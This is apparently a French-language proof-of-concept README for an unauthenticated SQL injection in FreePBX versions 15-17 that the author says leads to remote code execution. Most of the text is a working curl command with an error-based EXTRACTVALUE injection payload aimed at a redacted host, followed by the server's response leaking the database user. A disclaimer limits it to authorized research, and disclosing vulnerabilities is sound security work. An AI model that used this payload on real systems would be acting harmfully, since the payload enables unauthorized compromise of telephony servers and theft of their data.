
Les versions 15, 16 et 17 de FreePBX contiennent une vulnérabilité d'exécution de code à distance (RCE) causée par une désinfection insuffisante des données fournies par l'utilisateur dans les points de terminaison.
Les versions 15, 16 et 17 de FreePBX contiennent une vulnérabilité d'exécution de code à distance (RCE) causée par une insuffisance de nettoyage des données fournies par l'utilisateur dans les points de terminaison.
Un attaquant sans authentification peut manipuler la base de données et parvenir à exécuter du code à distance. L'exploit ne nécessite aucune authentification.
Remarque : La cible a été expurgée. Remplacez
[REDACTED_TARGET]par l'hôte réel lors des tests autorisés.
curl -i -k "https://[REDACTED_TARGET]/admin/ajax.php?module=FreePBX%5Cmodules%5Cendpoint%5Cajax&command=model&template=x&model=model&brand=x'+AND+EXTRACTVALUE(1,CONCAT('~USER:',(SELECT+USER()),'~'))+--+"
HTTP/1.1 500 Internal Server Error
Date: Fri, 12 Sep 2025 08:35:29 GMT
Server: Apache/2.4.6 (Sangoma) OpenSSL/1.0.1e-fips PHP/5.6.31
X-Powered-By: PHP/5.6.31
Set-Cookie: PHPSESSID=fmt7o0oecththmves36nijvfu7; expires=Sun, 12-Oct-2025 08:35:29 GMT; Max-Age=2592000; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: application/json
{"error":{"type":"Exception","message":"SQLSTATE[HY000]: General error: 1105 XPATH syntax error: '~USER:freepbxuser@localhost~'::","file":"\/var\/www\/html\/admin\/libraries\/utility.functions.php","line":207}}
Pourquoi cela prouve : la réponse contient ~USER:freepbxuser@localhost~ — confirme l'injection SQL / la divulgation de données à partir d'une requête non authentifiée.

Manipulation de base de données à distance sans authentification menant à l'exécution de code arbitraire sur le serveur — compromission totale du système possible.
Ce dépôt et ce PoC sont fournis uniquement à des fins de recherche en sécurité éducative et autorisée. N'effectuez pas de tests ou d'exploitation sur des systèmes sans autorisation explicite. L'auteur n'est pas responsable de l'utilisation abusive ou des dommages résultant de ce PoC.